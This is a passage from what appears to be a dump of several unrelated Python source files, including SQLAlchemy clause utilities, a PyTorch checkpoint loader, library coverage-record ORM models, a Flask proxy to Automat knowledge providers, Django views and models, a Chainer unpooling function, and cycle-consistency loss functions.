"'consider_as_referenced_keys'") def visit_binary(binary): if not any_operator and binary.operator is not operators.eq: return if not isinstance(binary.left, sql.ColumnElement) or \ not isinstance(binary.right, sql.ColumnElement): return if consider_as_foreign_keys: if binary.left in consider_as_foreign_keys and \ (binary.right is binary.left or binary.right not in consider_as_foreign_keys): pairs.append((binary.right, binary.left)) elif binary.right in consider_as_foreign_keys and \ (binary.left is binary.right or binary.left not in consider_as_foreign_keys): pairs.append((binary.left, binary.right)) elif consider_as_referenced_keys: if binary.left in consider_as_referenced_keys and \ (binary.right is binary.left or binary.right not in consider_as_referenced_keys): pairs.append((binary.left, binary.right)) elif binary.right in consider_as_referenced_keys and \ (binary.left is binary.right or binary.left not in consider_as_referenced_keys): pairs.append((binary.right, binary.left)) else: if isinstance(binary.left, schema.Column) and \ isinstance(binary.right, schema.Column): if binary.left.references(binary.right): pairs.append((binary.right, binary.left)) elif binary.right.references(binary.left): pairs.append((binary.left, binary.right)) pairs = [] visitors.traverse(expression, {}, {'binary':visit_binary}) return pairs def folded_equivalents(join, equivs=None): """Return a list of uniquely named columns. The column list of the given Join will be narrowed down to a list of all equivalently-named, equated columns folded into one column, where 'equated' means they are equated to each other in the ON clause of this join. This function is used by Join.select(fold_equivalents=True). Deprecated. This function is used for a certain kind of "polymorphic_union" which is designed to achieve joined table inheritance where the base table has no "discriminator" column; [ticket:1131] will provide a better way to achieve this. """ if equivs is None: equivs = set() def visit_binary(binary): if binary.operator == operators.eq and binary.left.name == binary.right.name: equivs.add(binary.right) equivs.add(binary.left) visitors.traverse(join.onclause, {}, {'binary':visit_binary}) collist = [] if isinstance(join.left, expression.Join): left = folded_equivalents(join.left, equivs) else: left = list(join.left.columns) if isinstance(join.right, expression.Join): right = folded_equivalents(join.right, equivs) else: right = list(join.right.columns) used = set() for c in left + right: if c in equivs: if c.name not in used: collist.append(c) used.add(c.name) else: collist.append(c) return collist class AliasedRow(object): """Wrap a RowProxy with a translation map. This object allows a set of keys to be translated to those present in a RowProxy. """ def __init__(self, row, map): # AliasedRow objects don't nest, so un-nest # if another AliasedRow was passed if isinstance(row, AliasedRow): self.row = row.row else: self.row = row self.map = map def __contains__(self, key): return self.map[key] in self.row def has_key(self, key): return key in self def __getitem__(self, key): return self.row[self.map[key]] def keys(self): return self.row.keys() class ClauseAdapter(visitors.ReplacingCloningVisitor): """Clones and modifies clauses based on column correspondence. E.g.:: table1 = Table('sometable', metadata, Column('col1', Integer), Column('col2', Integer) ) table2 = Table('someothertable', metadata, Column('col1', Integer), Column('col2', Integer) ) condition = table1.c.col1 == table2.c.col1 make an alias of table1:: s = table1.alias('foo') calling ``ClauseAdapter(s).traverse(condition)`` converts condition to read:: s.c.col1 == table2.c.col1 """ def __init__(self, selectable, equivalents=None, include=None, exclude=None): self.__traverse_options__ = {'column_collections':False, 'stop_on':[selectable]} self.selectable = selectable self.include = include self.exclude = exclude self.equivalents = util.column_dict(equivalents or {}) def _corresponding_column(self, col, require_embedded, _seen=util.EMPTY_SET): newcol = self.selectable.corresponding_column(col, require_embedded=require_embedded) if newcol is None and col in self.equivalents and col not in _seen: for equiv in self.equivalents[col]: newcol = self._corresponding_column(equiv, require_embedded=require_embedded, _seen=_seen.union([col])) if newcol is not None: return newcol return newcol def replace(self, col): if isinstance(col, expression.FromClause): if self.selectable.is_derived_from(col): return self.selectable if not isinstance(col, expression.ColumnElement): return None if self.include and col not in self.include: return None elif self.exclude and col in self.exclude: return None return self._corresponding_column(col, True) class ColumnAdapter(ClauseAdapter): """Extends ClauseAdapter with extra utility functions. Provides the ability to "wrap" this ClauseAdapter around another, a columns dictionary which returns adapted elements given an original, and an adapted_row() factory. """ def __init__(self, selectable, equivalents=None, chain_to=None, include=None, exclude=None, adapt_required=False): ClauseAdapter.__init__(self, selectable, equivalents, include, exclude) if chain_to: self.chain(chain_to) self.columns = util.populate_column_dict(self._locate_col) self.adapt_required = adapt_required def wrap(self, adapter): ac = self.__class__.__new__(self.__class__) ac.__dict__ = self.__dict__.copy() ac._locate_col = ac._wrap(ac._locate_col, adapter._locate_col) ac.adapt_clause = ac._wrap(ac.adapt_clause, adapter.adapt_clause) ac.adapt_list = ac._wrap(ac.adapt_list, adapter.adapt_list) ac.columns = util.populate_column_dict(ac._locate_col) return ac adapt_clause = ClauseAdapter.traverse adapt_list = ClauseAdapter.copy_and_process def _wrap(self, local, wrapped): def locate(col): col = local(col) return wrapped(col) return locate def _locate_col(self, col): c = self._corresponding_column(col, True) if c is None: c = self.adapt_clause(col) # anonymize labels in case they have a hardcoded name if isinstance(c, expression._Label): c = c.label(None) # adapt_required indicates that if we got the same column # back which we put in (i.e. it passed through), # it's not correct. this is used by eagerloading which # knows that all columns and expressions need to be adapted # to a result row, and a "passthrough" is definitely targeting # the wrong column. if self.adapt_required and c is col: return None return c def adapted_row(self, row): return AliasedRow(row, self.columns) def __getstate__(self): d = self.__dict__.copy() del d['columns'] return d def __setstate__(self, state): self.__dict__.update(state) self.columns = util.PopulateDict(self._locate_col)
py
1a3f7d7d0c880fa97c9bc28afce11ae01d03db01
import torch import os from collections import OrderedDict try: from torch.hub import load_state_dict_from_url except ImportError: from torch.utils.model_zoo import load_url as load_state_dict_from_url def load_checkpoint(model, checkpoint_path): if checkpoint_path and os.path.isfile(checkpoint_path): print("=> Loading checkpoint '{}'".format(checkpoint_path)) checkpoint = torch.load(checkpoint_path) if isinstance(checkpoint, dict) and 'state_dict' in checkpoint: new_state_dict = OrderedDict() for k, v in checkpoint['state_dict'].items(): if k.startswith('module'): name = k[7:] # remove `module.` else: name = k new_state_dict[name] = v model.load_state_dict(new_state_dict) else: model.load_state_dict(checkpoint) print("=> Loaded checkpoint '{}'".format(checkpoint_path)) else: print("=> Error: No checkpoint found at '{}'".format(checkpoint_path)) raise FileNotFoundError() def load_pretrained(model, url, filter_fn=None, strict=True): state_dict = load_state_dict_from_url(url, progress=False, map_location='cpu') input_conv = 'conv_stem' classifier = 'classifier' in_chans = getattr(model, input_conv).weight.shape[1] num_classes = getattr(model, classifier).weight.shape[0] input_conv_weight = input_conv + '.weight' pretrained_in_chans = state_dict[input_conv_weight].shape[1] if in_chans != pretrained_in_chans: if in_chans == 1: print('=> Converting pretrained input conv {} from {} to 1 channel'.format( input_conv_weight, pretrained_in_chans)) conv1_weight = state_dict[input_conv_weight] state_dict[input_conv_weight] = conv1_weight.sum(dim=1, keepdim=True) else: print('=> Discarding pretrained input conv {} since input channel count != {}'.format( input_conv_weight, pretrained_in_chans)) del state_dict[input_conv_weight] strict = False classifier_weight = classifier + '.weight' pretrained_num_classes = state_dict[classifier_weight].shape[0] if num_classes != pretrained_num_classes: print('=> Discarding pretrained classifier since num_classes != {}'.format(pretrained_num_classes)) del state_dict[classifier_weight] del state_dict[classifier + '.bias'] strict = False if filter_fn is not None: state_dict = filter_fn(state_dict) model.load_state_dict(state_dict, strict=strict)
py
1a3f7ec2904b58a990fe825dab0c17397541c799
# encoding: utf-8 # BaseCoverageRecord, Timestamp, CoverageRecord, WorkCoverageRecord from . import ( Base, get_one, get_one_or_create, ) import datetime from sqlalchemy import ( Column, DateTime, Enum, ForeignKey, Index, Integer, String, Unicode, UniqueConstraint, ) from sqlalchemy.orm.session import Session from sqlalchemy.sql.expression import ( and_, or_, literal, literal_column, ) class BaseCoverageRecord(object): """Contains useful constants used by both CoverageRecord and WorkCoverageRecord. """ SUCCESS = u'success' TRANSIENT_FAILURE = u'transient failure' PERSISTENT_FAILURE = u'persistent failure' REGISTERED = u'registered' ALL_STATUSES = [REGISTERED, SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE] # Count coverage as attempted if the record is not 'registered'. PREVIOUSLY_ATTEMPTED = [SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE] # By default, count coverage as present if it ended in # success or in persistent failure. Do not count coverage # as present if it ended in transient failure. DEFAULT_COUNT_AS_COVERED = [SUCCESS, PERSISTENT_FAILURE] status_enum = Enum(SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE, REGISTERED, name='coverage_status') @classmethod def not_covered(cls, count_as_covered=None, count_as_not_covered_if_covered_before=None): """Filter a query to find only items without coverage records. :param count_as_covered: A list of constants that indicate types of coverage records that should count as 'coverage' for purposes of this query. :param count_as_not_covered_if_covered_before: If a coverage record exists, but is older than the given date, do not count it as covered. :return: A clause that can be passed in to Query.filter(). """ if not count_as_covered: count_as_covered = cls.DEFAULT_COUNT_AS_COVERED elif isinstance(count_as_covered, basestring): count_as_covered = [count_as_covered] # If there is no coverage record, then of course the item is # not covered. missing = cls.id==None # If we're looking for specific coverage statuses, then a # record does not count if it has some other status. missing = or_( missing, ~cls.status.in_(count_as_covered) ) # If the record's timestamp is before the cutoff time, we # don't count it as covered, regardless of which status it # has. if count_as_not_covered_if_covered_before: missing = or_( missing, cls.timestamp < count_as_not_covered_if_covered_before ) return missing class Timestamp(Base): """Tracks the activities of Monitors, CoverageProviders, and general scripts. """ __tablename__ = 'timestamps' MONITOR_TYPE = "monitor" COVERAGE_PROVIDER_TYPE = "coverage_provider" SCRIPT_TYPE = "script" # A stand-in value used to indicate that a field in the timestamps # table should be explicitly set to None. Passing in None for most # fields will use default values. CLEAR_VALUE = object() service_type_enum = Enum( MONITOR_TYPE, COVERAGE_PROVIDER_TYPE, SCRIPT_TYPE, name="service_type", ) # Unique ID id = Column(Integer, primary_key=True) # Name of the service. service = Column(String(255), index=True, nullable=False) # Type of the service -- monitor, coverage provider, or script. # If the service type does not fit into these categories, this field # can be left null. service_type = Column(service_type_enum, index=True, default=None) # The collection, if any, associated with this service -- some services # run separately on a number of collections. collection_id = Column(Integer, ForeignKey('collections.id'), index=True, nullable=True) # The last time the service _started_ running. start = Column(DateTime, nullable=True) # The last time the service _finished_ running. In most cases this # is the 'timestamp' proper. finish = Column(DateTime) # A description of the things the service achieved during its last # run. Each service may decide for itself what counts as an # 'achievement'; this is just a way to distinguish services that # do a lot of things from services that do a few things, or to see # services that run to completion but don't actually do anything. achievements = Column(Unicode, nullable=True) # This column allows a service to keep one item of state between # runs. For example, a monitor that iterates over a database table # needs to keep track of the last database ID it processed. counter = Column(Integer, nullable=True) # The exception, if any, that stopped the service from running # during its previous run. exception = Column(Unicode, nullable=True) def __repr__(self): format = '%b %d, %Y at %H:%M' if self.finish: finish = self.finish.strftime(format) else: finish = None if self.start: start = self.start.strftime(format) else: start = None if self.collection: collection = self.collection.name else: collection = None message = u"<Timestamp %s: collection=%s, start=%s finish=%s counter=%s>" % ( self.service, collection, start, finish, self.counter ) return message @classmethod def lookup(cls, _db, service, service_type, collection): return get_one( _db, Timestamp, service=service, service_type=service_type, collection=collection ) @classmethod def value(cls, _db, service, service_type, collection): """Return the current value of the given Timestamp, if it exists. """ stamp = cls.lookup(_db, service, service_type, collection) if not stamp: return None return stamp.finish @classmethod def stamp( cls, _db, service, service_type, collection=None, start=None, finish=None, achievements=None, counter=None, exception=None ): """Set a Timestamp, creating it if necessary. This should be called once a service has stopped running, whether or not it was able to complete its task. :param _db: A database connection. :param service: The name of the service associated with the Timestamp. :param service_type: The type of the service associated with the Timestamp. This must be one of the values in Timestmap.service_type_enum. :param collection: The Collection, if any, on which this service just ran. :param start: The time at which this service started running. Defaults to now. :param finish: The time at which this service stopped running. Defaults to now. :param achievements: A human-readable description of what the service did during its run. :param counter: An integer item of state that the service may use to track its progress between runs. :param exception: A stack trace for the exception, if any, which stopped the service from running. """ if start is None and finish is None: start = finish = datetime.datetime.utcnow() elif start is None: start = finish elif finish is None: finish = start stamp, was_new = get_one_or_create( _db, Timestamp, service=service, service_type=service_type, collection=collection, ) stamp.update(start, finish, achievements, counter, exception) # Committing immediately reduces the risk of contention. _db.commit() return stamp def update(self, start=None, finish=None, achievements=None, counter=None, exception=None): """Use a single method to update all the fields that aren't used to identify a Timestamp. """ if start is not None: if start is self.CLEAR_VALUE: # In most cases, None is not a valid value for # Timestamp.start, but this can be overridden. start = None self.start = start if finish is not None: if finish is self.CLEAR_VALUE: # In most cases, None is not a valid value for # Timestamp.finish, but this can be overridden. finish = None self.finish = finish if achievements is not None: if achievements is self.CLEAR_VALUE: achievements = None self.achievements = achievements if counter is not None: if counter is self.CLEAR_VALUE: counter = None self.counter = counter # Unlike the other fields, None is the default value for # .exception, so passing in None to mean "use the default" and # None to mean "no exception" mean the same thing. But we'll # support CLEAR_VALUE anyway. if exception is self.CLEAR_VALUE: exception = None self.exception = exception def to_data(self): """Convert this Timestamp to an unfinalized TimestampData.""" from ..metadata_layer import TimestampData return TimestampData( start=self.start, finish=self.finish, achievements=self.achievements, counter=self.counter ) __table_args__ = ( UniqueConstraint('service', 'collection_id'), ) class CoverageRecord(Base, BaseCoverageRecord): """A record of a Identifier being used as input into some process.""" __tablename__ = 'coveragerecords' SET_EDITION_METADATA_OPERATION = u'set-edition-metadata' CHOOSE_COVER_OPERATION = u'choose-cover' REAP_OPERATION = u'reap' IMPORT_OPERATION = u'import' RESOLVE_IDENTIFIER_OPERATION = u'resolve-identifier' REPAIR_SORT_NAME_OPERATION = u'repair-sort-name' METADATA_UPLOAD_OPERATION = u'metadata-upload' id = Column(Integer, primary_key=True) identifier_id = Column( Integer, ForeignKey('identifiers.id'), index=True) # If applicable, this is the ID of the data source that took the # Identifier as input. data_source_id = Column( Integer, ForeignKey('datasources.id') ) operation = Column(String(255), default=None) timestamp = Column(DateTime, index=True) status = Column(BaseCoverageRecord.status_enum, index=True) exception = Column(Unicode, index=True) # If applicable, this is the ID of the collection for which # coverage has taken place. This is currently only applicable # for Metadata Wrangler coverage. collection_id = Column( Integer, ForeignKey('collections.id'), nullable=True ) __table_args__ = ( Index( 'ix_identifier_id_data_source_id_operation', identifier_id, data_source_id, operation, unique=True, postgresql_where=collection_id.is_(None)), Index( 'ix_identifier_id_data_source_id_operation_collection_id', identifier_id, data_source_id, operation, collection_id, unique=True ), ) def __repr__(self): template = '<CoverageRecord: %(timestamp)s identifier=%(identifier_type)s/%(identifier)s data_source="%(data_source)s"%(operation)s status="%(status)s" %(exception)s>' return self.human_readable(template) def human_readable(self, template): """Interpolate data into a human-readable template.""" if self.operation: operation = ' operation="%s"' % self.operation else: operation = '' if self.exception: exception = ' exception="%s"' % self.exception else: exception = '' return template % dict( timestamp=self.timestamp.strftime("%Y-%m-%d %H:%M:%S"), identifier_type=self.identifier.type, identifier=self.identifier.identifier, data_source=self.data_source.name, operation=operation, status=self.status, exception=exception, ) @classmethod def lookup(cls, edition_or_identifier, data_source, operation=None, collection=None): from datasource import DataSource from edition import Edition from identifier import Identifier _db = Session.object_session(edition_or_identifier) if isinstance(edition_or_identifier, Identifier): identifier = edition_or_identifier elif isinstance(edition_or_identifier, Edition): identifier = edition_or_identifier.primary_identifier else: raise ValueError( "Cannot look up a coverage record for %r." % edition) if isinstance(data_source, basestring): data_source = DataSource.lookup(_db, data_source) return get_one( _db, CoverageRecord, identifier=identifier, data_source=data_source, operation=operation, collection=collection, on_multiple='interchangeable', ) @classmethod def add_for(self, edition, data_source, operation=None, timestamp=None, status=BaseCoverageRecord.SUCCESS, collection=None): from edition import Edition from identifier import Identifier _db = Session.object_session(edition) if isinstance(edition, Identifier): identifier = edition elif isinstance(edition, Edition): identifier = edition.primary_identifier else: raise ValueError( "Cannot create a coverage record for %r." % edition) timestamp = timestamp or datetime.datetime.utcnow() coverage_record, is_new = get_one_or_create( _db, CoverageRecord, identifier=identifier, data_source=data_source, operation=operation, collection=collection, on_multiple='interchangeable' ) coverage_record.status = status coverage_record.timestamp = timestamp return coverage_record, is_new @classmethod def bulk_add(cls, identifiers, data_source, operation=None, timestamp=None, status=BaseCoverageRecord.SUCCESS, exception=None, collection=None, force=False, ): """Create and update CoverageRecords so that every Identifier in `identifiers` has an identical record. """ from identifier import Identifier if not identifiers: # Nothing to do. return _db = Session.object_session(identifiers[0]) timestamp = timestamp or datetime.datetime.utcnow() identifier_ids = [i.id for i in identifiers] equivalent_record = and_( cls.operation==operation, cls.data_source==data_source, cls.collection==collection, ) updated_or_created_results = list() if force: # Make sure that works that previously had a # CoverageRecord for this operation have their timestamp # and status updated. update = cls.__table__.update().where(and_( cls.identifier_id.in_(identifier_ids), equivalent_record, )).values( dict(timestamp=timestamp, status=status, exception=exception) ).returning(cls.id, cls.identifier_id) updated_or_created_results = _db.execute(update).fetchall() already_covered = _db.query(cls.id, cls.identifier_id).filter( equivalent_record, cls.identifier_id.in_(identifier_ids), ).subquery() # Make sure that any identifiers that need a CoverageRecord get one. # The SELECT part of the INSERT...SELECT query. data_source_id = data_source.id collection_id = None if collection: collection_id = collection.id new_records = _db.query( Identifier.id.label('identifier_id'), literal(operation, type_=String(255)).label('operation'), literal(timestamp, type_=DateTime).label('timestamp'), literal(status, type_=BaseCoverageRecord.status_enum).label('status'), literal(exception, type_=Unicode).label('exception'), literal(data_source_id, type_=Integer).label('data_source_id'), literal(collection_id, type_=Integer).label('collection_id'), ).select_from(Identifier).outerjoin( already_covered, Identifier.id==already_covered.c.identifier_id, ).filter(already_covered.c.id==None) new_records = new_records.filter(Identifier.id.in_(identifier_ids)) # The INSERT part. insert = cls.__table__.insert().from_select( [ literal_column('identifier_id'), literal_column('operation'), literal_column('timestamp'), literal_column('status'), literal_column('exception'), literal_column('data_source_id'), literal_column('collection_id'), ], new_records ).returning(cls.id, cls.identifier_id) inserts = _db.execute(insert).fetchall() updated_or_created_results.extend(inserts) _db.commit() # Default return for the case when all of the identifiers were # ignored. new_records = list() ignored_identifiers = identifiers new_and_updated_record_ids = [r[0] for r in updated_or_created_results] impacted_identifier_ids = [r[1] for r in updated_or_created_results] if new_and_updated_record_ids: new_records = _db.query(cls).filter(cls.id.in_( new_and_updated_record_ids )).all() ignored_identifiers = filter( lambda i: i.id not in impacted_identifier_ids, identifiers ) return new_records, ignored_identifiers Index("ix_coveragerecords_data_source_id_operation_identifier_id", CoverageRecord.data_source_id, CoverageRecord.operation, CoverageRecord.identifier_id) class WorkCoverageRecord(Base, BaseCoverageRecord): """A record of some operation that was performed on a Work. This is similar to CoverageRecord, which operates on Identifiers, but since Work identifiers have no meaning outside of the database, we presume that all the operations involve internal work only, and as such there is no data_source_id. """ __tablename__ = 'workcoveragerecords' CHOOSE_EDITION_OPERATION = u'choose-edition' CLASSIFY_OPERATION = u'classify' SUMMARY_OPERATION = u'summary' QUALITY_OPERATION = u'quality' GENERATE_OPDS_OPERATION = u'generate-opds' GENERATE_MARC_OPERATION = u'generate-marc' UPDATE_SEARCH_INDEX_OPERATION = u'update-search-index' id = Column(Integer, primary_key=True) work_id = Column(Integer, ForeignKey('works.id'), index=True) operation = Column(String(255), index=True, default=None) timestamp = Column(DateTime, index=True) status = Column(BaseCoverageRecord.status_enum, index=True) exception = Column(Unicode, index=True) __table_args__ = ( UniqueConstraint('work_id', 'operation'), ) def __repr__(self): if self.exception: exception = ' exception="%s"' % self.exception else: exception = '' template = '<WorkCoverageRecord: work_id=%s operation="%s" timestamp="%s"%s>' return template % ( self.work_id, self.operation, self.timestamp.strftime("%Y-%m-%d %H:%M:%S"), exception ) @classmethod def lookup(self, work, operation): _db = Session.object_session(work) return get_one( _db, WorkCoverageRecord, work=work, operation=operation, on_multiple='interchangeable', ) @classmethod def add_for(self, work, operation, timestamp=None, status=CoverageRecord.SUCCESS): _db = Session.object_session(work) timestamp = timestamp or datetime.datetime.utcnow() coverage_record, is_new = get_one_or_create( _db, WorkCoverageRecord, work=work, operation=operation, on_multiple='interchangeable' ) coverage_record.status = status coverage_record.timestamp = timestamp return coverage_record, is_new @classmethod def bulk_add(self, works, operation, timestamp=None, status=CoverageRecord.SUCCESS, exception=None): """Create and update WorkCoverageRecords so that every Work in `works` has an identical record. """ from work import Work if not works: # Nothing to do. return _db = Session.object_session(works[0]) timestamp = timestamp or datetime.datetime.utcnow() work_ids = [w.id for w in works] # Make sure that works that previously had a # WorkCoverageRecord for this operation have their timestamp # and status updated. update = WorkCoverageRecord.__table__.update().where( and_(WorkCoverageRecord.work_id.in_(work_ids), WorkCoverageRecord.operation==operation) ).values(dict(timestamp=timestamp, status=status, exception=exception)) _db.execute(update) # Make sure that any works that are missing a # WorkCoverageRecord for this operation get one. # Works that already have a WorkCoverageRecord will be ignored # by the INSERT but handled by the UPDATE. already_covered = _db.query(WorkCoverageRecord.work_id).select_from( WorkCoverageRecord).filter( WorkCoverageRecord.work_id.in_(work_ids) ).filter( WorkCoverageRecord.operation==operation ) # The SELECT part of the INSERT...SELECT query. new_records = _db.query( Work.id.label('work_id'), literal(operation, type_=String(255)).label('operation'), literal(timestamp, type_=DateTime).label('timestamp'), literal(status, type_=BaseCoverageRecord.status_enum).label('status') ).select_from( Work ) new_records = new_records.filter( Work.id.in_(work_ids) ).filter( ~Work.id.in_(already_covered) ) # The INSERT part. insert = WorkCoverageRecord.__table__.insert().from_select( [ literal_column('work_id'), literal_column('operation'), literal_column('timestamp'), literal_column('status'), ], new_records ) _db.execute(insert) Index("ix_workcoveragerecords_operation_work_id", WorkCoverageRecord.operation, WorkCoverageRecord.work_id)
py
1a3f7f189ca12e161b0ad371ae814eb20e56d15b
import copy import json import requests from flask import request from tranql.backplane.api.standard_api import StandardAPIResource from tranql.config import config ####################################################### ## # Automat - query Automat-KPs. ## ####################################################### class AutomatResource(StandardAPIResource): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.url = config.get("AUTOMAT_URL") def get_kp_reasoner_api(self, kp_tag): return f'{self.url}/{kp_tag}/query' def get_kp_schema_api(self, kp_tag): return f'{self.url}/{kp_tag}/predicates' class AutomatSchema(AutomatResource): def get(self, kp_tag): """ Automat Schema --- tags: [schema] description: Query schema of kp in automat parameters: - in: path name: kp_tag schema: type: string example: uberon required: true description: KP identifier to get data from. responses: '200': description: Schema content: application/json: schema: type: object example: population_of_individual_organisms: phenotypic_feature: - association named_thing: - association activity_and_behavior: - association '500': description: An error was encountered content: application/json: schema: $ref: '#/definitions/Error'""" url = self.get_kp_schema_api(kp_tag) response = requests.get(url) if response.status_code != 200 : result = { "status": "error", "code": "service_invocation_error", "message": f"Bad Automat response. When getting schema. url: {self.url} \n request: {json.dumps(request.json, indent=2)} " f"response: \n{response.text}." } return result, 500 else: return response.json() class AutomatQuery(AutomatResource): """ Generic graph query to Gamma. """ def post(self, kp_tag): """ Automat query --- tags: [query] description: Query the Automat KPs. parameters: - in: path name: kp_tag schema: type: string example: uberon required: true description: KP identifier to get data from. requestBody: description: Input message required: true content: application/json: schema: $ref: '#/definitions/Message' example: knowledge_graph: nodes: [] edges: [] knowledge_maps: - {} question_graph: nodes: - id: "chemical_substance" type: "chemical_substance" curie: "CHEMBL:CHEMBL3" - id: "disease" type: "disease" edges: - id: "e1" source_id: "chemical_substance" target_id: "disease" options: {} responses: '200': description: Message content: application/json: schema: $ref: '#/definitions/Message' '500': description: An error was encountered content: application/json: schema: $ref: '#/definitions/Error' """ self.validate (request, 'Message') url = self.get_kp_reasoner_api(kp_tag) # question_graph should be query graph question = request.json question['query_graph'] = copy.deepcopy(question['question_graph']) del question['question_graph'] del question['knowledge_graph'] del question['knowledge_maps'] response = requests.post(url, json={"message": question}) if response.status_code >= 300: result = { "status": "error", "code": "service_invocation_failure", "message": f"Bad Automat response. url: {self.url} \n request: " f"{json.dumps(request.json, indent=2)} response: \n{response.text}." } else: result = self.down_cast_message(response.json()) return self.response(result) class AutomatRegistry(AutomatResource): def get(self): """ Automat query --- tags: [query] description: Query the Automat KPs. responses: '200': description: Message content: application/json: schema: - 'intact' - 'ctd' '500': description: An error was encountered content: application/json: schema: $ref: '#/definitions/Error' """ response = requests.get(self.url + '/registry') if response.status_code == 200: return response.json() else: result = { "status": "error", "code": "service_invocation_failure", "message": f"Bad Automat response. Contacting registry url: {self.url} \n request: " f"{json.dumps(request.json, indent=2)} response: \n{response.text}." } return result
py
1a3f80bdf0fc20debb87e3e66331ecb4b28d9da4
from django.http.response import HttpResponse from django.views.generic import View from common.models import OfficerAllegation from common.json_serializer import JSONSerializer from allegation.services.outcome_analytics import OutcomeAnalytics from allegation.query_builders import OfficerAllegationQueryBuilder class OfficerAllegationAnalysisAPIView(View): def __init__(self, **kwargs): super(OfficerAllegationAnalysisAPIView, self).__init__(**kwargs) def get_officer_allegations(self, request, ignore_filters=None): queries = OfficerAllegationQueryBuilder()\ .build(request.GET, ignore_filters) return OfficerAllegation.objects.filter(queries) def get(self, request): officer_allegations = self.get_officer_allegations(request) analytics = OutcomeAnalytics.get_analytics(officer_allegations) content = JSONSerializer().serialize({ 'analytics': analytics }) return HttpResponse(content)
py
1a3f81179653f8fb7108807af9e3d0cfffb07ce8
# python3 from .compression import compress_jpeg from .decompression import decompress_jpeg
py
1a3f8199a9e5c7b14ca1e87b4ea24dc079498e23
from django.db import models from django.utils import timezone from django.contrib.auth.models import User from django.urls import reverse class Post(models.Model): image = models.ImageField(upload_to='images/') caption = models.TextField() date_posted = models.DateTimeField(default=timezone.now) author = models.ForeignKey(User, on_delete=models.CASCADE) def __str__(self): return self.caption def get_absolute_url(self): return reverse('post_detail', kwargs={'pk': self.pk}) # comment class Comment(models.Model): post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='comments') comment = models. CharField(max_length=140,null=True, blank = False) author = models.ForeignKey(User,on_delete=models.CASCADE) def __str__(self): return self.comment def get_absolute_url(self): return reverse("post_list")
py
1a3f81dbd446dfd24f7826ad5263aecc91694fba
from chainer import cuda from chainer.functions.pooling import pooling_2d from chainer.utils import conv from chainer.utils import type_check class Unpooling2D(pooling_2d.Pooling2D): """Unpooling over a set of 2d planes.""" def __init__(self, ksize, stride=None, pad=0, outsize=None, cover_all=True): super(Unpooling2D, self).__init__(ksize, stride, pad, cover_all) self.outh, self.outw = (None, None) if outsize is None else outsize def check_type_forward(self, in_types): n_in = in_types.size() type_check.expect(n_in == 1) x_type = in_types[0] type_check.expect( x_type.dtype.kind == 'f', x_type.ndim == 4, ) if self.outh is not None: expected_h = conv.get_conv_outsize( self.outh, self.kh, self.sy, self.ph, cover_all=self.cover_all) type_check.expect(x_type.shape[2] == expected_h) if self.outw is not None: expected_w = conv.get_conv_outsize( self.outw, self.kw, self.sx, self.pw, cover_all=self.cover_all) type_check.expect(x_type.shape[3] == expected_w) def forward(self, x): h, w = x[0].shape[2:] if self.outh is None: self.outh = conv.get_deconv_outsize( h, self.kh, self.sy, self.ph, cover_all=self.cover_all) if self.outw is None: self.outw = conv.get_deconv_outsize( w, self.kw, self.sx, self.pw, cover_all=self.cover_all) xp = cuda.get_array_module(*x) col = xp.tile(x[0][:, :, xp.newaxis, xp.newaxis], (1, 1, self.kh, self.kw, 1, 1)) if isinstance(x[0], cuda.ndarray): y = conv.col2im_gpu(col, self.sy, self.sx, self.ph, self.pw, self.outh, self.outw) else: y = conv.col2im_cpu(col, self.sy, self.sx, self.ph, self.pw, self.outh, self.outw) return y, def backward(self, x, gy): if isinstance(gy[0], cuda.ndarray): gcol = conv.im2col_gpu( gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw, cover_all=self.cover_all) else: gcol = conv.im2col_cpu( gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw, cover_all=self.cover_all) gx = gcol.sum(axis=(2, 3)) return gx, def unpooling_2d(x, ksize, stride=None, pad=0, outsize=None, cover_all=True): """Inverse operation of pooling for 2d array. This function acts similarly to :class:`~functions.Deconvolution2D`, but it spreads input 2d array's value without any parameter instead of computing the inner products. Args: x (~chainer.Variable): Input variable. ksize (int or pair of ints): Size of pooling window. ``ksize=k`` and ``ksize=(k, k)`` are equivalent. stride (int, pair of ints or None): Stride of pooling applications. ``stride=s`` and ``stride=(s, s)`` are equivalent. If ``None`` is specified, then it uses same stride as the pooling window size. pad (int or pair of ints): Spatial padding width for the input array. ``pad=p`` and ``pad=(p, p)`` are equivalent. outsize (None or pair of ints): Expected output size (height, width) of array after the operation. If ``None``, the size (height or width) is estimated from the size of input array in first batch with :func:`~chainer.utils.conv.get_deconv_outsize`. If outsize is not ``None``, the result of outsize applied to :func:`~chainer.utils.conv.get_conv_outsize` must be equal to the shape of the 2d array in the input batch ``x``. cover_all (bool): If ``True``, all spatial locations are pooled into some output pixels, and the output size is larger than that when cover_all is ``False``. Returns: ~chainer.Variable: Output variable. """ return Unpooling2D(ksize, stride, pad, outsize, cover_all)(x)
py
1a3f81eb7e52eeb6821d97f274ef9444e28be2e1
# coding=utf-8 # Copyright 2020 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Loss functions imposing the cycle-consistency constraints.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow.compat.v2 as tf def classification_loss(logits, labels, label_smoothing): """Loss function based on classifying the correct indices. In the paper, this is called Cycle-back Classification. Args: logits: Tensor, Pre-softmax scores used for classification loss. These are similarity scores after cycling back to the starting sequence. labels: Tensor, One hot labels containing the ground truth. The index where the cycle started is 1. label_smoothing: Float, label smoothing factor which can be used to determine how hard the alignment should be. Returns: loss: Tensor, A scalar classification loss calculated using standard softmax cross-entropy loss. """ # Just to be safe, we stop gradients from labels as we are generating labels. labels = tf.stop_gradient(labels) return tf.reduce_mean(tf.keras.losses.categorical_crossentropy( y_true=labels, y_pred=logits, from_logits=True, label_smoothing=label_smoothing)) def regression_loss(logits, labels, num_steps, steps, seq_lens, loss_type, normalize_indices, variance_lambda, huber_delta): """Loss function based on regressing to the correct indices. In the paper, this is called 